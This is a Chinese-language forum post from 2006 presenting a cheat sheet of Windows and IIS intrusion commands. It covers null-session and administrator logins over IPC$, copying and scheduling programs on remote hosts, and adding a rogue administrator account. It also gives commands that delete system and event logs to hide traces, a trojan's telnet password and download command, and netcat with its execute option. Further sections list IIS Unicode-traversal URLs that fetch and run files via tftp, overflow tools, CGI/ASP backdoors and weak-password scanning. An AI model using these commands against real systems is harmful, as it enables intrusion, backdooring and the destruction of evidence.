查看單個文章
舊 2006-03-01, 09:09 PM   #4 (permalink)
psac
榮譽會員
 
psac 的頭像
榮譽勳章
UID - 3662
在線等級: 級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時級別:30 | 在線時長:1048小時 | 升級還需:37小時
註冊日期: 2002-12-07
住址: 木柵市立動物園
文章: 17381
現金: 5253 金幣
資產: 33853 金幣
預設

網管和黑客都必須知道的指令!看了不要做壞事!

常用的幾條NET指令:

==================================================

(與遠端主機建立空管連接) net use \\IP位址\ipc$ "" /use:""

(以管理員身份登入遠端主機) net use \\IP位址\ipc$ "密碼" /use:"Administrator"

(傳送文件到遠端主機WINNT目錄下)copy 本地機目錄路徑\程序 \\IP位址\admin$

(檢視遠端主機時間) net time \\IP位址

(定時啟動某個程序) at \\IP位址 02:18 readme.exe

(檢視共享) net view \\IP位址

(檢視netbios工作組列表) nbtstat -A IP位址

(將遠端主機C碟映射為自己的F盤) net use f: \\IP位址\c$ ""/user:"Administrator"

(這兩條把自己增加到管理員組): net user 用戶名 密碼 /add

net localgroup Administrators 用戶名 /add

(中斷連線連接) net use \\IP位址\ipc$ /delete

=====================================================

擦屁屁:

del C:\winnt\system32\logfiles\*.*

del C:\winnt\ssytem32\config\*.evt

del C:\winnt\system32\dtclog\*.*

del C:\winnt\system32\*.log

del C:\winnt\system32\*.txt

del C:\winnt\*.txt

del C:\winnt\*.log

============================

一、netsvc.exe

下面的指令分別是列出主機上的服務項目、查尋和遠端啟動主機的「時間工作」服務:

netsvc /list \\IP位址

netsvc schedule \\IP位址 /query

netsvc \\IP位址 schedule /start

二、OpenTelnet.exe

遠端啟動主機的Telnet服務,並綁定連接阜到7878,例如:

OpenTelnet \\IP位址 用戶名 密碼 1 7878

然後就可以telnet到主機的7878連接阜,進入DOS方式下:

telnet IP位址 7878

三、winshell.exe

一個非常小的木馬(不到6K),telnet到主機的7878連接阜,輸入密碼winshell,當看到CMD>後,可打下面的指令:

p Path (檢視winshell主程序的路徑訊息)

b reBoot (重新啟動機器)

d shutDown (關閉機器)

s Shell (執行後你就會看到可愛的「C:\>」)

x eXit (結束本次登入會話,此指令並不終止winshell的執行)

CMD> http://.../srv.exe (通過http下載其他網站上的文件到執行winshell的電腦上)

四、3389登入器,GUI方式登入遠端主機的

五、elsave.exe

事件日誌清除工具

elsave -s \\IP位址 -l "application" -C

elsave -s \\IP位址 -l "system" -C

elsave -s \\IP位址 -l "security" -C

執行後成功清除應用程式日誌,系統日誌,安全日誌

六、hbulot.exe

開啟win2kserver和winxp的3389服務

hbulot [/r]

使用/r表示安裝完成後自動重新啟動目標使設定生效。

七、nc.exe(netcat.exe)

一個很好的工具,一些指令碼程序都要用到它,也可做溢位後的連接用。

想要連線到某處: nc [-options] hostname port[s] [ports] ...

綁定連接阜等待連接: nc -l -p port [-options] [hostname] [port]

參數:

-e prog 程序重轉發IP,一旦連接,就執行 [危險!!]

-g gateway source-routing hop point[s], up to 8

-G num source-routing pointer: 4, 8, 12, ...

-h 說明 訊息

-i secs 延時的間隔

-l 監聽模式,用於入站連接

-n 指定數位的IP位址,不能用hostname

-o file 記錄16進制的傳輸

-p port 本機連接阜號

-r 任意指定本機及遠端連接阜

-s addr 本機源位址

-u UDP模式

-v 詳細輸出——用兩個-v可得到更詳細的內容

-w secs timeout的時間

-z 將輸入輸出關掉——用於掃瞄時

八、TFTPD32.EXE

把自己的電腦臨時變為一台FTP伺服器,讓目標物來下載文件,tftp指令要在目標物上執行,通常要利用Unicode漏洞或telnet到目標物,例如:

http://IP位址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本地機IP位址 get 檔案名 c:\winnt\system32\檔案名

然後可以直接令文件執行:

http://IP位址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+檔案名

九、prihack.exe是IIS的printer遠端緩衝區溢位工具。idqover.exe是溢位idq的,選項「溢位後在一個連接阜監聽」,然後用telnet連接它的監聽連接阜,如果溢位成功,一連它的連接阜,綁定的指令馬上執行。xploit.exe是一個圖形界面的ida溢位,成功以後winxp下需要打winxp。

一○、ntis.exe、cmd.exe和cmdasp.asp是三個cgi-backdoor,exe要放到cgi-bin目錄下,asp放到有ASP執行權限的目錄。然後用IE瀏覽器連接。

一、一 Xscan指令行執行參數說明:

在檢測程序中,按"[空格]"鍵可以檢視各執行緒狀態及掃瞄進度,按"q"鍵儲存當前資料後提前結束程序,按"<ctrl+c>"強行關閉程序。

1.指令格式: xscan -host <起始IP>[-<終止IP>] <檢測項目> [其他選項]

xscan -file <主機列表檔案名> <檢測項目> [其他選項]

其中<檢測項目> 含義如下:

-port : 檢測常用服務的連接阜狀態(可通過\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"項設定待檢測連接阜列表);

-ftp : 檢測FTP弱密碼(可通過\dat\config.ini文件設定用戶名/密碼字典文件);

-ntpass : 檢測NT-Server弱密碼(可通過\dat\config.ini文件設定用戶名/密碼字典文件);

-cgi : 檢測CGI漏洞(可通過\dat\config.ini文件的"CGI-ENCODE\encode_type"項設定編碼方案);

-iis : 檢測IIS漏洞(可通過\dat\config.ini文件的"CGI-ENCODE\encode_type"項設定編碼方案);

[其他選項] 含義如下:

-v: 顯示詳細掃瞄進度

-p: 跳過Ping不通的主機

-o: 跳過沒有檢測到開放連接阜的主機

-t <並發執行緒數量[,並發主機數量]>: 指定最大並發執行緒數量和並發主機數量, 預設數量為100,10
__________________
http://bbsimg.qianlong.com/upload/01/08/29/68/1082968_1136014649812.gif
psac 目前離線  
送花文章: 3, 收花文章: 1631 篇, 收花: 3205 次